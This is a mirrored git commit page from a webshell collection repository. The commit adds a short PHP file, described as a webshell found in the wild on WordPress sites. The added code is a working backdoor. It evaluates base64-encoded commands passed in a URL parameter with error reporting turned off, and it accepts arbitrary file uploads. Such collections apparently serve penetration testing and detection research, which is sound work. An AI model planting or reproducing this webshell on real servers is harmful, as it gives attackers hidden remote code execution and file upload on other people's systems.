mirror of
https://github.com/BlackArch/webshells
synced 2024-11-10 06:14:16 +00:00
php: add haccess.php
Simple webshell found in the wild - usually on wordpress stuff but have found it elsewhere
This commit is contained in:
parent
f081f1e321
commit
7bb8544fb0
1 changed files with 11 additions and 0 deletions
11
php/haccess.php
Normal file
11
php/haccess.php
Normal file
|
@ -0,0 +1,11 @@
|
|||
<?php
|
||||
error_reporting(0);
|
||||
$ev = $_GET["ev"];
|
||||
|
||||
if (isset($ev) && !empty($ev))
|
||||
{
|
||||
eval(base64_decode($ev));
|
||||
exit;
|
||||
}
|
||||
|
||||
(@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"])); ?>
|
Loading…
Reference in a new issue